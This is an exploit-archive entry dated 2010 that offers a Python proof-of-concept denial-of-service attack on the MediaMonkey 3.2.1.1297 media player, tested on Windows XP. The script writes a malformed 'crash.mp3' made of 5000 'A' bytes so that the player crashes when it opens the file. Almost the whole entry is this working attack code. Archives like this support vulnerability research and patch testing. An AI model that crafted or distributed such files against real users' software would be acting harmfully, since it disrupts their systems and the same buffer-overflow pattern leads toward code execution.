id: 13579
date: 08/05/2010
title: Mediamonkey v. 3.2.1.1297 DOS POC
author: Abhishek Lyall
cves: 

=================================
Mediamonkey v. 3.2.1.1297 DOS POC
=================================


#Mediamonkey v. 3.2.1.1297 DOS POC
#vulnerble application link http://www.mediamonkey.com/trialpay
#tested on XP SP2/3
#author abhishek lyall - abhilyll[at]gmail[dot]com
#!/usr/bin/python

filename = "crash.mp3"


junk = "\x41" * 5000

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()



#  0day.today [2023-03-24]  #